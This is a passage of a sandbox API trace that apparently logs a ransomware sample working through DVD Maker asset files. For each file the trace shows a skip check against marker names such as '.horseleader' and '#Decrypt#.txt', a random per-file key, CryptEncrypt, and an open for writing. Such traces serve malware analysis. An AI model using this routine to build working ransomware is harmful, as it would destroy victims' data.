Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.856] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xba2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationButtonSubpicture.png", cAlternateFileName="")) returned 1 [0251.856] lstrcmpiW (lpString1="NavigationButtonSubpicture.png", lpString2="Windows") returned -1 [0251.856] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png") returned 85 [0251.856] StrStrIW (lpFirst="NavigationButtonSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.856] lstrcmpW (lpString1="NavigationButtonSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.857] lstrcmpW (lpString1="NavigationButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.857] lstrlenW (lpString=".testttjffg") returned 11 [0251.857] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.857] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.857] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.857] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.857] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.857] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png") returned 77 [0251.857] StrStrIW (lpFirst="NextMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.858] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.858] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.858] lstrlenW (lpString=".testttjffg") returned 11 [0251.858] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.858] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.858] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 
[0251.858] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.858] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.858] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png") returned 79 [0251.859] StrStrIW (lpFirst="ParentMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.859] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.859] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.859] lstrlenW (lpString=".testttjffg") returned 11 [0251.859] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.859] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.859] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.860] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeeb, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.860] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.860] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 81 [0251.861] StrStrIW (lpFirst="PreviousMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.861] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.861] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.861] lstrlenW (lpString=".testttjffg") returned 11 [0251.861] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.861] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.861] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.861] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f458ec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f458ec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SceneButtonInset_Alpha1.png", cAlternateFileName="")) returned 1 [0251.861] lstrcmpiW (lpString1="SceneButtonInset_Alpha1.png", lpString2="Windows") returned -1 [0251.861] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png") returned 82 [0251.861] StrStrIW (lpFirst="SceneButtonInset_Alpha1.png", lpSrch=".horseleader") returned 0x0 [0251.862] lstrcmpW (lpString1="SceneButtonInset_Alpha1.png", lpString2="#Decrypt#.txt") returned 1 [0251.862] lstrcmpW (lpString1="SceneButtonInset_Alpha1.png", lpString2="_uninstalling_.png") returned 1 [0251.862] lstrlenW (lpString=".testttjffg") returned 11 [0251.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png", lpSrch=".testttjffg") returned 0x0 [0251.862] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.862] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.862] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f6ba49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f6ba49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdbe, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SceneButtonInset_Alpha2.png", cAlternateFileName="")) returned 1 [0251.862] lstrcmpiW (lpString1="SceneButtonInset_Alpha2.png", lpString2="Windows") returned -1 [0251.862] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png") returned 82 [0251.862] StrStrIW (lpFirst="SceneButtonInset_Alpha2.png", lpSrch=".horseleader") returned 0x0 [0251.862] lstrcmpW (lpString1="SceneButtonInset_Alpha2.png", lpString2="#Decrypt#.txt") returned 1 [0251.863] lstrcmpW (lpString1="SceneButtonInset_Alpha2.png", lpString2="_uninstalling_.png") returned 1 [0251.863] lstrlenW (lpString=".testttjffg") returned 11 [0251.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png", lpSrch=".testttjffg") returned 0x0 [0251.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.863] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e8721b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71e8721b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SceneButtonSubpicture.png", cAlternateFileName="")) returned 1 [0251.863] lstrcmpiW (lpString1="SceneButtonSubpicture.png", lpString2="Windows") returned -1 [0251.863] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png") returned 80 [0251.863] StrStrIW (lpFirst="SceneButtonSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.863] lstrcmpW (lpString1="SceneButtonSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.863] lstrcmpW (lpString1="SceneButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.863] lstrlenW (lpString=".testttjffg") returned 11 [0251.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.864] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.864] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.864] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.865] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71893b93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71893b93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x500e57b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x539540, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainBackground.wmv", cAlternateFileName="")) returned 1 [0251.865] lstrcmpiW (lpString1="SportsMainBackground.wmv", lpString2="Windows") returned -1 [0251.865] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 79 [0251.865] StrStrIW (lpFirst="SportsMainBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.865] lstrcmpW (lpString1="SportsMainBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.865] lstrcmpW (lpString1="SportsMainBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.865] lstrlenW (lpString=".testttjffg") returned 11 [0251.865] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.865] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.865] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.866] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71aa8ea9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71aa8ea9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x502ae81f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x57bbc0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.866] lstrcmpiW (lpString1="SportsMainBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.866] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 83 [0251.866] StrStrIW (lpFirst="SportsMainBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.866] lstrcmpW (lpString1="SportsMainBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.866] lstrcmpW (lpString1="SportsMainBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.866] lstrlenW (lpString=".testttjffg") returned 11 [0251.866] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.866] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.866] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.866] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c25c4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71c25c4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50320c39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1beae6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.866] lstrcmpiW (lpString1="SportsMainToNotesBackground.wmv", lpString2="Windows") returned -1 [0251.867] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 86 [0251.867] StrStrIW (lpFirst="SportsMainToNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.867] lstrlenW (lpString=".testttjffg") returned 11 [0251.867] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.867] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: 
pbBuffer=0x32aea98) returned 1 [0251.867] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.867] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71cbe1bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71cbe1bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50393053, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a26, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.867] lstrcmpiW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.867] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 90 [0251.867] StrStrIW (lpFirst="SportsMainToNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.867] lstrlenW (lpString=".testttjffg") returned 11 [0251.867] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.867] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.867] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.868] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71d7c890, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71d7c890, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x504c3b43, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x184166, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.868] lstrcmpiW (lpString1="SportsMainToScenesBackground.wmv", lpString2="Windows") returned -1 [0251.868] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 87 [0251.869] StrStrIW (lpFirst="SportsMainToScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground.wmv", lpString2="_uninstalling_.png") 
returned 1 [0251.869] lstrlenW (lpString=".testttjffg") returned 11 [0251.869] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.869] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.869] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 